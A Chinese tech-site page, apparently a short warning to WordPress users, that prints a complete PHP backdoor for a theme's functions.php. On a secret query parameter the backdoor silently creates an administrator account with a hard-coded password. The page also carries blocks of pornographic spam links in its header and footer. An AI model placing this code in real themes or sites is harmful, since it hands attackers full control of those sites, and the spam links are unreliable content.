激情久久久_欧美视频区_成人av免费_不卡视频一二三区_欧美精品在欧美一区二区少妇_欧美一区二区三区的

服務(wù)器之家:專注于服務(wù)器技術(shù)及軟件下載分享
分類導(dǎo)航

DEDECMS|帝國CMS|Discuz|PHPCMS|Wordpress|ZBLOG|ECSHOP|蘋果CMS|極致CMS|CMS系統(tǒng)|

服務(wù)器之家 - 建站程序 - Wordpress - 防范wordpress主題加后門代碼獲取管理員權(quán)限

防范wordpress主題加后門代碼獲取管理員權(quán)限

2019-09-18 13:42wordpress教程網(wǎng) Wordpress

只需幾行代碼就可以為WordPress主題留下后門,大家要小心了

代碼如下:


add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

 

簡單說明下,代碼主要放于functions.php文件里面,不會影響任何功能使用,如果存在此代碼,任何人只要運(yùn)行http://www.你的域名.com/?backdoor=go,然后就創(chuàng)建了一個(gè)用戶名為“backdoor”,密碼為:“pa55w0rd!” 的管理員。同樣具備管理員的權(quán)限,很編輯主題代碼文件,相信此時(shí)你一定感覺到很危險(xiǎn)了吧,趕緊檢查檢查自己的主題代碼吧……

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 蜜桃视频在线观看视频 | av国产在线被下药迷网站 | 精品一二三区视频 | 超碰一区 | 久草最新在线 | 九九热在线免费观看视频 | 国产午夜电影在线观看 | 欧美性videofree精品 | 一本视频在线观看 | 中国a级黄色片 | 校花被肉干高h潮不断 | 日韩视频在线观看免费 | 1000部精品久久久久久久久 | 国产精品av久久久久久网址 | 久久久午夜电影 | 免费毛片视频 | 日韩字幕在线观看 | 日韩色视频在线观看 | 一级免费在线视频 | 欧美伦理一区二区 | 欧美一级片 在线播放 | 最新中文字幕第一页视频 | 极品一级片 | www亚洲免费| 中国黄色一级生活片 | 国产亚洲精品久久久久5区 综合激情网 | 欧美性受ⅹ╳╳╳黑人a性爽 | 艹逼视频污 | 国产va在线观看 | 日本亚洲欧美 | 久久久久二区 | 在线免费视频a | 黄色网址入口 | 性插视频 | 成人不卡免费视频 | 久久精品日韩一区 | 色婷婷久久久亚洲一区二区三区 | 色综合久久久久久久久久 | 国产精品久久久久久久娇妻 | 国产成人强伦免费视频网站 | 国产一区二区精彩视频 |